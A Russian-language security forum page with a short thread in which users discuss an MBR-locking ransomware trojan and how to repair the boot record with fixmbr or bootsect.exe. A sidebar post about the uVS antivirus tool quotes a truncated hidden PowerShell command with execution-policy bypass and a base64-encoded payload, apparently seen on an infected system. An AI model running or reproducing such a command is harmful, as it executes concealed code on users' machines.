Перейти к содержанию
Danilka

Еще один троянец-вымогатель - теперь в MBR

Автор Danilka, в Общий форум по информационной безопасности

Recommended Posts

demkd    575

demkd
Опубликовано

Ну вот теперь осталось дождаться перешивок биоса. Чтоб вымогал $$ сразу после POST-а :D Хотя можно и проще блокировать загрузку с диска.... кстати интересно как там дела у касперского с их запатентованным аппаратным антивирусом :)

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

ntoskrnl    155

ntoskrnl
Опубликовано
считает значение и сравнивает его с хэшем размером в 2 байта:

.......

К счастью, жесткий диск или файлы не шифруются

.......

Оригинальная главная загрузочная запись сохраняется в четвертом секторе жесткого диска вместе с маркером зловреда

Да это разве "Охренеть" :) Опять школьники балуются. :) Вот чего с Gpcode.ax делать?...

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

sww    486

sww
Опубликовано
кстати интересно как там дела у касперского с их запатентованным аппаратным антивирусом :)

Для того, чтобы вылечить это аппаратный антивирус не нужен. Старый-добрый fixmbr.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    575

demkd
Опубликовано
Для того, чтобы вылечить это аппаратный антивирус не нужен. Старый-добрый fixmbr.

Это как бы в консоль еще попасть нужно, что... несколько затруднено в данном случае, я лично предпочитаю мелкософтовский bootsect.exe. А про аппаратный антивирус просто вспомнилось глядя на черный скриншот, даже не знаю почему :)

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

sww    486

sww
Опубликовано
Это как бы в консоль еще попасть нужно, что... несколько затруднено в данном случае, я лично предпочитаю мелкософтовский bootsect.exe. А про аппаратный антивирус просто вспомнилось глядя на черный скриншот, даже не знаю почему :)

Не вижу сложностей загрузиться с Windows Repair.

Как выяснилось данный локер не оставляет таблицу разделов (она сохранена лишь в копии MBR), поэтому fixmbr не поможет.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

DiabloNova    175

DiabloNova
Опубликовано

Кидисы дорвались до мбр ха.

Ну вот теперь осталось дождаться перешивок биоса. Чтоб вымогал $$ сразу после POST-а

Долго же еще ждать с такими то буткитами и их установщиками. Бедная офикла.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты
Перейти к списку тем Общий форум по информационной безопасности

  • Сообщения

    • PR55.RP55
      Новые функции в Universal Virus Sniffer (uVS)

      От PR55.RP55 · Опубликовано

      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
      uVS - Тестирование

      От SQx · Опубликовано

    • SQx
      uVS - Тестирование

      От SQx · Опубликовано

      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      uVS - Тестирование

      От demkd · Опубликовано

      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      uVS - Тестирование

      От PR55.RP55 · Опубликовано

      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×